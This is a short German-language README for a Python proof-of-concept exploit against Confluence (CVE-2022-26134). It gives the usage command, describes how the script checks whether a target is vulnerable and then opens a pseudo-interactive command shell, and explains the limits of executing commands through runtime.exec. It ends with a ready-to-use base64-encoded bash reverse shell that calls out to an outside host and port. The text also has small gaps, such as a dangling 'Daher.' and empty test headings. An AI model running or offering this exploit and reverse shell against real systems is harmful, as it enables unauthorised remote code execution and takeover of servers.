
[CVE-2022-26134]Confluence-RCE durch OGNL-Expression-Injection mit Sandbox-Bypass.
Confluence OGNL expression injected RCE (CVE-2022-26134) PoC und Exploit
Sandbox-Umgehung hinzugefügt, höhere Versionen unterstützt.
Usage: python Confluence_cve_2022_26134_RCE.py http://example.com/
Das Skript prüft automatisch, ob das Ziel verwundbar ist, und öffnet bei Verwundbarkeit eine pseudo-interaktive Shell.
Test unter Linux:

Test unter Windows:

Geben Sie 'q' ein, wenn Sie beenden möchten.
Befehlsargumente werden direkt an die runtime.exec-Methode übergeben, die keinen Shell-Kontext hat.
Daher.
Unter Windows können einige Befehle wie dir nicht direkt ausgeführt werden; verwenden Sie stattdessen cmd.exe /c dir.
Unter Linux können einige Sonderzeichen nicht wirksam werden. Wenn Sie einen Befehl mit Sonderzeichen wie einer Reverse Shell ausführen müssen, können Sie ihn Base64-kodieren und dann bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4ODggMD4mmQ==}|{base64,-d}|{bash,-i} verwenden.